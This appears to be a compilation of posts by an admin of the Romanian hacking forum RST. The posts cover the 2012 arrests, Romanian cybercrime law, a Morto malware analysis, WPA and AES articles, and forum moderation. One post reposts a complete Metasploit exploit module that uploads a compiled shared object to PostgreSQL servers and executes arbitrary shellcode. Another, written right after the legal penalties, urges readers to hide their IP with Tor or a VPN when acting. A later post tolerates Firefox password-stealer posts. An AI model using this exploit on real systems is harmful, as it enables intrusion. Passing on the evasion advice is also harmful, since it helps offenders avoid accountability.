Nytro

Si Nytro? Unde e Nytro

Pentru cei care nu stiu, sa aducem cateva lamuriri. Ce s-a intamplat? Totul a inceput asa: http://webtv.realitatea.net/gruparea-de-hackeri-rst-center-anihilata_904638.html Mai multe persoane au fost arestate pentru carding si vina a picat pe RST. De ce? Unele dintre persoanele arestate aveau cont aici. Aveti aici si videoclipul baietilor veseli: http://www.diicot.ro/images/videos/articles/28.11.2012.mp4 Ce e important: "efectuarea de opera?iuni frauduloase cu instrumente de plat? electronic?". Mai multe detalii in comunicatul lor de presa: http://www.diicot.ro/index.php/arhiva/782-comunicat-de-presa-27-11-2012 Screenshot: http://defcamp.ro/wp-content/uploads/2012/11/rst_poc.png Dupa cum puteti vedea si in comunicatul celor de la DIICOT, RST nu are nicio legatura directa cu acest sir de arestari. RST nu e un grup criminalistic (informational) organizat ci o comunitate publica destinata tinerilor pasionati de securitate IT. Tot ce are legatura cu frauda informationala, furtul cardurilor de credit, scam/phishing, skimming, licitatii false si multe altele, este STRICT INTERZIS pe RST. Problema a aparut deoarece printre persoanele arestate a fost si o victima colaterala, care hosta atat RST, cat si multe alte site-uri importante, printre care si zoso: http://defcamp.ro/wp-content/uploads/2012/11/zoso.ro_.png . Este penibil sa arestezi o persoana care gazduieste niste servere, nu avea cum sa stie ce se intampla pe fiecare server in parte, dar la cum functioneaza "justitita" in Romania ne putem astepta la orice. De ce un alt domeniu? Singura persoana care avea acces la vechiul domeniu, www.rstcenter.com, era tex, administrator RST si persoana care isi pierdea timpul hostand RST. Fiind arestat preventiv pentru 29 de zile, nu puteam avea acces la vechiul domeniu si am fost nevoiti sa alegem unul nou. Aceasta este o modificare temporara, speram ca tex sa fie eliberat, apoi vom vedea ce este de facut in continuare. Am revenit Era pacat ca o intreaga comunitate sa sufere din cauza unor "carderi", asadar am revenit. Vreau insa sa va atrag atentia asupra unor aspecte mai putin cunoscute de voi, mai exact asupra legilor din Romania. Stiu, nu sunt bine definite, se pot interpreta, dar e important ca exista, si mai important este ca din cauza lor puteti avea probleme si incercam sa evitam acest lucru. Legea 161/2003, "Prevenirea si combaterea criminalitatii informatice": http://www.legi-internet.ro/legislatie-itc/criminalitate-informatica/prevederi-legislative-privind-prevenirea-si-combaterea-criminalitatii-informatice.html , printre altele, spune si: CAPITOLUL III Infrac?iuni ?i contraven?ii SEC?IUNEA 1 Infrac?iuni contra confiden?ialit??ii ?i integrit??ii datelor ?i sistemelor informatice Art. 42. - (1) Accesul, f?r? drept, la un sistem informatic constituie infrac?iune ?i se pedepse?te cu închisoare de la 3 luni la 3 ani sau cu amend?. (2) Fapta prev?zut? la alin. (1), s?vâr?it? în scopul ob?inerii de date informatice, se pedepse?te cu închisoare de la 6 luni la 5 ani. (3) Dac? fapta prev?zut? la alin. (1) sau (2) este s?vâr?it? prin înc?lcarea m?surilor de securitate, pedeapsa este închisoarea de la 3 la 12 ani. Art. 43. - (1) Interceptarea, f?r? drept, a unei transmisii de date informatice care nu este public? ?i care este destinat? unui sistem informatic, provine dintr-un asemenea sistem sau se efectueaz? în cadrul unui sistem informatic constituie infrac?iune ?i se pedepse?te cu închisoare de la 2 la 7 ani. (2) Cu aceea?i pedeaps? se sanc?ioneaz? ?i interceptarea, f?r? drept, a unei emisii electromagnetice provenite dintr-un sistem informatic ce con?ine date informatice care nu sunt publice. Art. 44. - (1) Fapta de a modifica, ?terge sau deteriora date informatice ori de a restric?iona accesul la aceste date, f?r? drept, constituie infrac?iune ?i de pedepse?te cu închisoare de la 2 la 7 ani. (2) Transferul neautorizat de date dintr-un sistem informatic se pedepse?te cu închisoare de la 3 la 12 ani. (3) Cu pedeapsa prev?zut? la alin. (2) se sanc?ioneaz? ?i transferul neautorizat de date dintr-un mijloc de stocare a datelor informatice. Art. 45. - Fapta de a perturba grav, f?r? drept, func?ionarea unui sistem informatic, prin introducerea, transmiterea, modificarea, ?tergerea sau deteriorarea datelor informatice sau prin restric?ionarea accesului la aceste date constituie infrac?iune ?i se pedepse?te cu închisoare de la 3 la 15 ani. Art. 46. - (1) Constituie infrac?iune ?i se pedepse?te cu închisoare de la 1 la 6 ani: a) fapta de a produce, vinde, de a importa, distribui sau de a pune la dispozi?ie, sub orice alt? form?, f?r? drept, a unui dispozitiv sau program informatic conceput sau adaptat în scopul s?vâr?irii uneia dintre infrac?iunile prev?zute la art. 42-45; fapta de a produce, vinde, de a importa, distribui sau de a pune la dispozi?ie, sub orice alt? form?, f?r? drept, a unei parole, cod de acces sau alte asemenea date informatice care permit accesul total sau par?ial la un sistem informatic în scopul s?vâr?irii uneia dintre infrac?iunile prev?zute la art. 42-45. (2) Cu aceea?i pedeaps? se sanc?ioneaz? ?i de?inerea, f?r? drept, a unui dispozitiv, program informatic, parol?, cod de acces sau dat? informatic? dintre cele prev?zute la alin. (1) în scopul s?vâr?irii uneia dintre infrac?iunile prev?zute la art. 42-45. Art. 47. - Tentativa infrac?iunilor prev?zute la art. 42-46 se pedepse?te. SEC?IUNEA a 2-a Infrac?iuni informatice Art. 48. - Fapta de a introduce, modifica sau ?terge, f?r? drept, date informatice ori de a restric?iona, f?r? drept, accesul la aceste date, rezultând date necorespunz?toare adev?rului, în scopul de a fi utilizate în vederea producerii unei consecin?e juridice, constituie infrac?iune ?i se pedepse?te cu închisoare de la 2 la 7 ani. Art. 49. - Fapta de a cauza un prejudiciu patrimonial unei persoane prin introducerea, modificarea sau ?tergerea de date informatice, prin restric?ionarea accesului la aceste date ori prin împiedicarea în orice mod a func?ion?rii unui sistem informatic, în scopul de a ob?ine un beneficiu material pentru sine sau pentru altul, constituie infrac?iune ?i se pedepse?te cu închisoare de la 3 la 12 ani. Art. 50. - Tentativa infrac?iunilor prev?zute la art. 48 ?i 49 se pedepse?te. Ce inseamna asta? Folositi in pula mea Tor, VPN sau orice altceva pentru a va ascunde IP-ul cand faceti ceva. De asemenea aveti grija de "privacy", nu faceti publice date personale, invatati sa va "ascundeti". In urmatoarele zile vom lua cateva decizii legate de acest aspect aici. Diseara vom pune si certificatul SSL, nu va faceti griji pentru asta. Si in acest post incercati sa va abtineti de la comentarii idioate. Postati aici eventuale probleme ale forumului, ca si "nu merge sa postezi imagini". Stay safe!

[h=1]PostgreSQL for Linux Payload Execution[/h] ### # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/core/exploit/postgres' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report # Creates an instance of this module. def initialize(info = {}) super(update_info(info, 'Name' => 'PostgreSQL for Linux Payload Execution', 'Description' => %q{ On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries's from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions. }, 'Author' => [ 'midnitesnake', # this Metasploit module 'egypt', # on-the-fly compiled .so technique 'todb' # original windows module this is based on ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ] ], 'Platform' => 'linux', 'Payload' => { 'Space' => 65535, 'DisableNops' => true, }, 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ], [ 'Linux x86_64', { 'Arch' => ARCH_X86_64 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 05 2007' )) deregister_options('SQL', 'RETURN_ROWSET') end # Buncha stuff to make typing easier. def username; datastore['USERNAME']; end def password; datastore['PASSWORD']; end def database; datastore['DATABASE']; end def rhost; datastore['rhost']; end def rport; datastore['rport']; end def verbose; datastore['VERBOSE']; end def bits; datastore['BITS'];end def execute_command(cmd, opts) postgres_sys_exec(cmd) end def exploit version = do_login(username,password,database) case version when :noauth; print_error "Authentication failed."; return when :noconn; print_error "Connection failed."; return else print_status("#{rhost}:#{rport} - #{version}") end fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so" tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname) unless tbl && fld && so && oid print_error "Could not upload the UDF SO" return end print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})" begin func_name = Rex::Text.rand_text_alpha(10) postgres_query( "create or replace function pg_temp.#{func_name}()"+ " returns void as '#{so}','#{func_name}'"+ " language 'C' strict immutable" ) rescue end postgres_logout if @postgres_conn end # Authenticate to the postgres server. # # Returns the version from #postgres_fingerprint def do_login(user=nil,pass=nil,database=nil) begin password = pass || postgres_password vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") result = postgres_fingerprint( :db => database, :username => user, :password => password ) if result[:auth] report_service( :host => rhost, :port => rport, :name => "postgres", :info => result.values.first ) return result[:auth] else return :noauth end rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError return :noconn end end def payload_so(filename) shellcode = Rex::Text.to_hex(payload.encoded, "\\x") #shellcode = "\\xcc" c = %Q^ int _exit(int); int printf(const char*, ...); int perror(const char*); void *mmap(int, int, int, int, int, int); void *memcpy(void *, const void *, int); int mprotect(void *, int, int); int fork(); int unlink(const char *pathname); #define MAP_PRIVATE 2 #define MAP_ANONYMOUS 32 #define PROT_READ 1 #define PROT_WRITE 2 #define PROT_EXEC 4 #define PAGESIZE 0x1000 char shellcode[] = "#{shellcode}"; void run_payload(void) __attribute__((constructor)); void run_payload(void) { int (*fp)(); fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); memcpy(fp, shellcode, sizeof(shellcode)); if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) { _exit(1); } if (!fork()) { fp(); } unlink("#{filename}"); return; } ^ cpu = case target_arch.first when ARCH_X86; Metasm::Ia32.new when ARCH_X86_64; Metasm::X86_64.new end payload_so = Metasm::ELF.compile_c(cpu, c, "payload.c") so_file = payload_so.encode_string(:lib) so_file end end Sursa: http://www.exploit-db.com/exploits/23360/

vgbverg b54633

Plm vvvvvvvvv xcvxcvxc http://sdfdsfdsfs

Nu ma pricep, am incercat (si a mers) cu oclhashcat-plus. Altceva nici nu stiu.

Fail Trash. "Pentru 1000 de cuvinte introduse veti primi cate 1$/0.90 $/0.75 $/ depinde de oferta in fiecare saptamana" 1000 de cuvinte * 10 secunde/cuvant = 10000 de secunde. 10000 de secunde / 3600 = 2.5 ORE Cu alte cuvinte castigi 3 dolari / ZI lucrand 8 ore / ZI. Adica 100 de dolari pe luna. Castig mai mult daca stau sa caut monede pe jos.

Am si eu Nvidia GeForce 9500 GT la munca. Nu e cine stie ce, dar pare sa parcurga MD5 pentru [a-z] in 36 de minute. Speed........: 90980.1k c/s Real, 95113.0k c/s GPU Daca vreti las si eu peste noapte cate un hash.

"Deep Web con?ine 7500 de terabytes de informa?ii" De unde au scos rahatul asta? "Exista mai multe mult de 200.000 de site-uri Deep Web." Nu cred ca exista nici 200.000 de utilizatori Tor. "con?ine aproape 550 miliarde de documente individuale" Daca aici sunt cuprinse toate documentele private ale tuturor companiilor din lume, e (putin) posibil, dar "accesibile cu Tor" in niciun caz. ------------------ Da, traficanti si alte natii de oameni mai gasesti, au cam disparut si ei pentru ca e probabil plin de agenti infiltrati. Dar se spun prea multe cacaturi despre acest cica "Deep web" care nu e nici 10% din Internet si ce se gaseste public...

Lasa-ma sa ghicesc: - Conturi de pe cine stie ce site de cacat - Carduri salvate in baza de date a cine stie carui site de cacat Ultimii doi ani, pe 5 noiembrie: - 2011 - Cica picau Facebooku, ei, 30 de persoane cu LOIC vs miile de servere Facebook. Rezultatul: prima pula in cur pentru magicii Anonimusi - 2012 - Cica pica tot "Internetul" prin DDOS catre serverele DNS globale, ei, 30 de ratati cu LOIC vs servere ca si j.root-servers.net care e gazduit de VeriSign (si nu de oricine) pe 41 de servere. Rezultatul: a doua pula, mai groasa, in cur pentru ei. Acum ce fac? Stiu: Anonymous o sa suga pula lui Mos Craciun si ne dezvalui cat de mare e! Edit: Acum am vazut jegu de videoclip. Aici avem un loc special pentru asa ceva: Cosul de gunoi. Sa zici mersi ca nu iti dau ban.

1. Nu sunt 20 de topicuri despre cryptografie pe forum si nu am vazut prea multe topicuri create de tine pe aceasta tema. Cand vom vedea ca se posteaza despre crypto o data la 2-3 zile cel putin, atunci vom lua in considerare. 2. Nu am vazut prea multe proiecte ale membrilor in ultimii 3 ani. Iar o porcarie de crypter facut de altcineva pe care un membru scrie "by mine" nu e tocmai un proiect. De asemenea, un program de 20 de linii de cod care nu face mai nimic nu e un proiect. Faceti proiecte, veti fi usor de remarcat. 3. Ar fi cam inutil, nu am vazut prea multe posturi in care sa se vorbeasca despre alti membri, sa incercam sa nu transformam RST chiar in Facebook.

Merge acum?

[h=1]Win32/Morto – Made in China, now with PE file infection[/h]by Pierre-Marc Bureau Security Intelligence Program Manager In July 2012, our virus laboratory came across what we first thought was a new family of malware. The threat spread by infecting Portable Executable or PE files used by Windows, but this malware also infected systems through remote desktop and network shares. After further analysis, we realized we were dealing with a new version of a known malware family: Win32/Morto. The author of this malware – which had already infected thousands of hosts – had updated his creation to add file infection capabilities. Win32/Morto is best known for being a computer worm, that is, a fully-self-contained rogue program that spreads copies of itself. Adding file-infecting code allows the worm to function as a computer virus as well by attaching copies of itself to other programs which can then be used to further spread the infection. This type of evolution is out of the ordinary and it prompted us to dig further in order to understand this malware better. We are presenting the results of our analysis this week at the AVAR conference in HangZhou, China. This blog contains a summary of the key findings presented at the conference. Our analysis shows that adding file infection capabilities to this malware had a significant impact on the speed at which it spread. The next figure shows the number of detections of this threat over time. We clearly see a sharp increase in detections around July; this is when the malware was updated to start infecting PE files. Other characteristics of this malware have remained constant across variants. For example, Win32/Morto has been using the DNS infrastructure to receive commands from its operator. The bot will make a DNS TXT request and will decode the received text so as to update its modules. The figure below shows one such DNS TXT response with the encoded string, which contains the update information. The information is encoded using an algorithm close to base64, but with a different alphabet. The information received by the bot is simply a list of modules to be downloaded, decrypted and executed. During the last four months, we have seen three different modules being used by the bot. One of the modules is an update to the viral code used for maintaining persistence and infecting files, one module is used to spread by exploiting weak passwords in Remote Desktop and the last module is used to launch distributed denial of service attacks and to display advertisements on the infected system. There are several clues in the malware code that suggest it was written by a native Chinese speaker. For example, the User-Agent string used by the malware advertises the Chinese language. The geographical distribution of this threat also hints as to its origin. The following figure shows the geographical distribution of Win32/Morto detections. The dark blue color indicates a high proportion of detections while light yellow shows a small proportion of detections. The map shows a significant number of detections through Asia, including Mongolia, Tajikistan, Uzbekistan and China. This might also indicate where the infection started and continued to spread. The two main infection vectors of Win32/Morto are through file infection and the exploitation of weak Remote Desktop credentials. We recommend that users use strong passwords and use an up-to-date antivirus solution to help them stay protected from this threat. Acknowledgment: I would like to acknowledge François Chagnon and Miroslav Babis for their help in analyzing Win32/Morto. Sursa: Win32/Morto – Made in China, now with PE file infection | ESET ThreatBlog

[h=1]Microsoft Security Bulletin Summary for November 2012[/h]Published: Tuesday, November 13, 2012 | Updated: Wednesday, November 14, 2012 This bulletin summary lists security bulletins released for November2012. With the release of the security bulletins for November 2012, this bulletin summary replaces the bulletin advance notification originally issued November 8, 2012. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification. For information about how to receive automatic notifications whenever Microsoft security bulletins are issued, visit Microsoft Technical Security Notifications. Microsoft is hosting a webcast to address customer questions on these bulletins on November 14, 2012, at 11:00 AM Pacific Time (US & Canada). Register now for the November Security Bulletin Webcast. After this date, this webcast is available on-demand. Microsoft also provides information to help customers prioritize monthly security updates with any non-security updates that are being released on the same day as the monthly security updates. Please see the section, Other Information. [h=3]Bulletin Information[/h][h=4]Executive Summaries[/h]The following table summarizes the security bulletins for this month in order of severity. For details on affected software, see the next section, Affected Software and Download Locations. Vedeti link-ul: http://technet.microsoft.com/en-us/security/bulletin/ms12-nov Cam multe Remote Code Execution, deci "stay safe".

Ooo da, asa, pe fata...

Ok, sper sa am diseara timp... 1. Fac o lista cu intrebari din domeniul securitatii IT 2. Intrebarile nu isi vor gasi raspuns usor pe Google si vreau raspunsuri "explicate" si vor fi din: putina programare, securitate web, sisteme de operare, retelistica, cunostinte generale 3. La intrebari se va raspunde pe mesenger pentru a ma asigura ca raspunsul vine prompt si nu se cauta ore pe Google 4. Dau ban tuturor care au dat like postului meu si celor care sunt de acord cu test la inregistrare 5. Astept sa ma contacteze (voi face un ID de mesenger pentru asta) 6. Le pun acele intrebari si daca nu raspund corect raman pe dinafara Asa e corect. Din moment ce unii au cont "free", altii de ce sa trebuiasca sa dea un test pentru a intra? Si cu aceasta ocazie ii verificam si pe cei care doresc acest lucru. De acord?

Apare un nou protocol care imbunatateste cu pana la 700% semnalul WiFi! de Redactia Hit | 15 noiembrie 2012 Cercetatorii de la NC State University (NCSU) au descoperit un noua cale de a amplifica si imbunatati retele WiFi. Dezvoltatorii vorbesc despre un protocol care imbunatateste cu pana la 700% semnalul! Partea cea mai interesanta a proiectului este ca nu vorbim despre infrastructura sau componente noi dezvoltate de cercetatori, ci doar despre software. Pachetul dezvoltat de cei de la NCSU monitorizeaza punctele de acces si reduce timpul de retransmitere a datelor catre utilizatori (tot printr-un singur canal). Asta inseamna ca pe actualele retele s-ar putea face, cu putin efort, un update pentru optimizarea semnalului. Noul protocol, denumit WiFox, descongestioneaza practic traficul de date din reteaua respectiva in momentul in care este folosita de un numar mare de utilizatori. Sursa: The Next Web Via: Apare un nou protocol care imbunatateste cu pana la 700% semnalul WiFi! | Hit.ro

Converting .docx to pdf (or .doc to pdf, or .doc to odt, etc.) with libreoffice on a webserver on the fly using php Vezi si asta: http://www.phplivedocx.org/

Postez aici pentru a nu deschide un nou topic. Mica rearanjare a categoriilor: "Web Design Stuff" a devenit "Web Development" si se regaseste sub sectiunea de "Programare" dupa cum probabil ati vazut.

Windows Research Kernel The Windows Academic Program supplies universities with concepts, code, and projects useful for integrating core Windows® kernel technologies into teaching and research. The program includes Windows OS Internals Curriculum Resource Kit (CRK), ProjectOZ, and Windows Research Kernel. These components illustrate real-world examples of the principles taught in class and provide source code and materials for academic purposes. You can explore the program resources using the Online Resource Kit or download the components below. Download: http://jacekowski.org/WindowsResearchKernel-WRK.zip http://www.filetransfer.ro/5tk72D http://www.multiupload.nl/C0CW6Y105G http://www.speedyshare.com/8dR72/WindowsResearchKernel-WRK.zip A se vedea si: http://kernelexplorer.net/blogs/kore/archive/2009/04/19/Building-the-Windows-kernel.aspx

PDF Search Engine http://openpdf.info/ Mi se pare foarte util, gaseste link-uri directe.

Cracking the WPA Security Standard By Andrew Garcia | Posted 2008-11-09 Analysis: As security researchers prepare to discuss how they were able to subvert the WPA wireless security standard, eWEEK Labs outlines what this means to wireless administrators. At the PacSec conference in Tokyo the week of Nov. 10, researchers Erik Tews and Martin Beck will outline the attack they created to subvert WPA wireless security protections. Although the attack is limited in scope at this time-as it only affects TKIP (Temporal Key Integrity Protocol)-protected networks and can only be used to inject traffic but not to steal data-there is sure to be significant confusion about the effects of the attack. In this article, I have outlined five points about the attack and its consequences that are crucial for wireless administrators to understand-about how it works, what its limits are, and what can be done to protect wireless networks and the data they carry from attackers. First of all, the attack by Tews and Beck only works against networks protected with TKIP. TKIP, originally called WEP2, was an interim standard adopted to allow wireless users to have an upgrade from the broken WEP (Wired Equivalent Privacy) protocol that lets them protect their wireless data without requiring an investment in new hardware. TKIP took the basics of WEP (and therefore uses the same RC4 stream cipher), enforced a longer encryption key, added per-packet keys, boosted the Initialization Vector used to generate keys from 24-bit to 48-bit in length, and added a new Integrity Check checksum (called Michael). It is Michael that is at the root of the new attack. The attack, which leverages a modified chop-chop attack that allows the decryption of individual packets without cracking the Pairwise Master key (the shared secret between clients and the network used for encryption), goes after the Pairwise Transient Key protecting the session in order to interpret very small packets (like an ARP) of just a few bytes of unknown data. The attacker must probe cautiously because Michael will shut down a device for 60 seconds and rekey if it sees two Michael errors within a minute. However, because there is little to guess in these small packets, the attacker only needs to spend a few minutes (12 to 15 minutes, from what I understand) probing Michael until it stops returning errors. At that point, the attacker can then go to work with the chop-chop attack to get past the integrity check built into the original WEP (that TKIP still uses). AES-protected networks, on the other hand, are immune to this attack, as AES uses an entirely different keying method called CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol). Second, because the encryption key is not broken as part of this attack, and the subversion of the Michael Integrity Check the attack uses is really only practical when interpreting small packets (too much to guess and not enough time before a regularly scheduled rekeying event happens), an attacker cannot decrypt and steal data from over the air. However, the attack (along with some MAC spoofing) allows the attacker to pose as an access point in order to inject a small amount of traffic into the stream. This traffic injection could be used to poison the client's ARP or DNS caches, redirecting the machine to an unintended (and possibly nefarious) destination. "In the worst possible case scenario, the attacker can inject-pretending to be the access point-up to seven packets to the client," said Rick Farina, senior wireless security researcher at AirTight Networks. "The client will accept these as validly encrypted. You could cause all kinds of denial-of-service conditions by ARP spoofing, or you could probably convince the client to talk to a server on the Internet." However, wireless users and administrators should not be fooled into thinking WPA2 equals safety from this attack. The WPA2 Wi-Fi certification standard includes both AES- and TKIP-based security as options, so wireless administrators must make sure that a WPA2-protected network only supports AES encryption in order to be safe from this attack. Third, from what I gather, the mode of authentication used for a WPA with a TKIP network does not make a difference. This attack should work against TKIP-protected networks running either preshared key or 802.1x/EAP authentication, since the attack is going after the Pairwise Transient Key, which is used in both cases. However, enterprise wireless administrators may be able to tune their networks to rekey at a faster rate than normal to thwart the attack (I've heard the attack authors recommend rekeying every 2 minutes). But wireless administrators should evaluate carefully whether the performance impact from this change is significantly greater than the impact derived from moving to AES encryption instead. Also, since this is not a brute force attack, wireless administrators should be aware that the length of a preshared key does not make a difference with this attack. Fourth, you may already have defenses in place to protect you from this attack. Companies using Wireless Intrusion Detection and Prevention technology, like that provided by AirTight Networks or Motorola's AirDefense unit, should have some protection from this attack right away. These systems can definitely identify MAC spoofing that would be used as part of an attempt to inject traffic. Location detection tools could also be useful: Since the attacker has to pose as an access point, the system should throw up immediate warnings if it looks like an access point suddenly moved. Presumably, WIPS vendors are right now cooking up new detections as well to help find and correlate any Michael errors that must occur as part of the attack. Since Michael errors are rare (it's pretty hard to accidentally change data payload without changing the checksum hash), a regular stream of Michael errors happening every 61 seconds or so should be easy to detect and send out an alert. As a temporary workaround solution, TKIP enjoyed a remarkably good run without coming under serious threat. However, with this first attack now published (and early-generation tools using the attack, like aircrack-ng, available in the wild), undoubtedly TKIP will come under significantly more scrutiny in the months to come. Consequently (fifth), even though the encryption is not yet broken, wireless administrators should start re-evaluating the use of WPA and TKIP. Many companies are already faced with some wireless upgrades to come into compliance with PCI 1.2, which last month finally put a timeline in place for retiring WEP as a security measure on wireless networks carrying sensitive data. For those companies needing to finally retire old scanners, bar code readers or other wireless mobile devices used for transactions, make sure to look for AES support on your next equipment investments. Fortunately, most enterprise-grade equipment bought in the last four years will have support for AES. However, some patches may be necessary to get common client devices up to speed. Windows Mobile devices running versions prior to WM 6.1 may not offer AES support, so mobile administrators should investigate whether an upgrade is available. Also, those who use the Windows XP and the Zero-Config wireless tool (but have not yet installed Windows XP SP3) will also need to install a patch to add AES support. eWEEK Labs Senior Technical Analyst Andrew Garcia can be reached at agarcia@eweek.com. Sursa: Cracking the WPA Security Standard

256-bit AES Encryption for SSL and TLS: Maximal Security Updated 12/7/2011 with AES security data for the newest browsers and mobile devices. SSL and TLS are the workhorses that provide the majority of security in the transmission of data over the Internet today. However, most people do not know that the degree of security and privacy inherent in a “secure” connection of this sort can vary from “almost none” to “really really good … good enough for US government TOP SECRET data”. The piece which varies and thus provides the variable level of security is the “cipher” or “encryption technique”. There are a large number of different ciphers — some are very fast and very insecure. Some are slower and very secure. Some weak ones (export-grade ciphers) are around from the days when the USA did not permit the export of decent security to other countries. AES, the Advanced Encryption Standard, is a relatively new encryption technique/cipher that is the successor of DES. AES was standardized in 2001 after a 5 year review, and is currently one of the most popular algorithms used in symmetric key cryptography (which, for example, is used for the actual data transmission in SSL and TLS). It is also the “gold standard” encryption technique; many security-conscious organizations actually require that their employees use AES-256 (256-bit AES) for all communications. This article discusses AES, its role in SSL, which web browsers and email programs support it, how you can make sure that you only use 256-bit AES encryption of all secure communications, and more. More about AES AES has been available in most cryptographic libraries for a long time. It was available in “OpenSSL” starting in 2002 with v0.9.7. OpenSSL is the foundation of most SSL services in UNIX and Linux environments, such as that used by LuxSci. GPG, the open source implementation of PGP, also include an AES 256 option. So, while AES is the new kid on the block, it has been around long enough to permeate most software. However, as we shall see, this does not mean that is its actually being used on your computer! How Secure is 256-bit AES? AES is FIPS (Federal Information Processing Standard) certified and there are currently no known non-brute-force direct attacks against AES (except some side channel timing attacks on the processing of AES that are not feasible over a network environment and this not applicable to SSL in general). In fact, AES security is strong enough to be certified for use by the US government for top secret information. The design and strength of all key lengths of the AES algorithm (i.e., 128, 192 and 256) are sufficient to protect classified information up to the SECRET level. TOP SECRET information will require use of either the 192 or 256 key lengths. The implementation of AES in products intended to protect national security systems and/or information must be reviewed and certified by NSA prior to their acquisition and use.” (Lynn Hathaway, June 2003 – reference.) If you have the choice of encryption methods, 256-bit AES is the method to choose. Also good are 128-bit and 192-bit versions of AES. Tutorial complet: http://luxsci.com/blog/256-bit-aes-encryption-for-ssl-and-tls-maximal-security.html

Cine mai e de acord ca trebuie dat test la inregistrare?

1. De acord daca te ocupi tu si mai gasesti pe cineva care sa te ajute 2. Unele sunt ok pentru cateva zile, sa nu ii "descurajam" pe doritorii nostri de parole de Firefox 3. De ce nu? Cam toata lumea trece la Windows 7, procentul de compatibilitate e foarte mare